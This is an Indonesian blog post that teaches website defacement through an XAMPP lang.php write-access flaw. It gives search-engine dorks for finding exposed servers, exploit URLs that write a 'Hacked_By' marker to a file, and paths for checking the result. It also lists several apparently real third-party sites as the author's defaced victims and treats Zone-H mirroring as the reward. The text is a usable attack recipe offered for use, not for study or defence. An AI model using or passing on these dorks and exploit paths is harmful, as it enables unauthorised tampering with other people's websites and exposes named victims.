Naufal Ardhani - Kali in aku akan memberikan Tutorial Deface Xampp Local Write Access, POC ini sedang banyak digunakan oleh defacer defacer karna apa? ntah lah :v karna aku cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... manfaatnya yaitu dapat mirror di Zone-H :)
Oke Langsung aja
-Dork
Oke Langsung aja
-Dork
- inurl:/security/lang.php
- inurl:/xampp/lang.php
-Exploit
- /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
- /security/lang.php?Hacked_By_E4OXY ( untuk dir security )
-Preview
- /xampp/lang.tmp ( untuk dir xampp )
- /security/lang.tmp ( untuk dir security )
-Step
- Dorking dulu, jika aku memakai dork "inurl:/security/lang.php intext:xampp",
- Beri Exploitnya, teladan "/security/lang.php?Hacked_By_E4OXY" (karna disini aku pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
- Jika berhasil akan ibarat gambar dibawah,
- Untuk Preview kesudahannya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
Hasil aku :
http://www.mp-mall.com.hk/security/lang.tmp
http://www.moghulisran.com/security/lang.tmp
http://www.altebagestion.net/security/lang.tmp
http://vega-apache.ingeneo.co/security/lang.tmp
SEKIAN WASSALAM :)
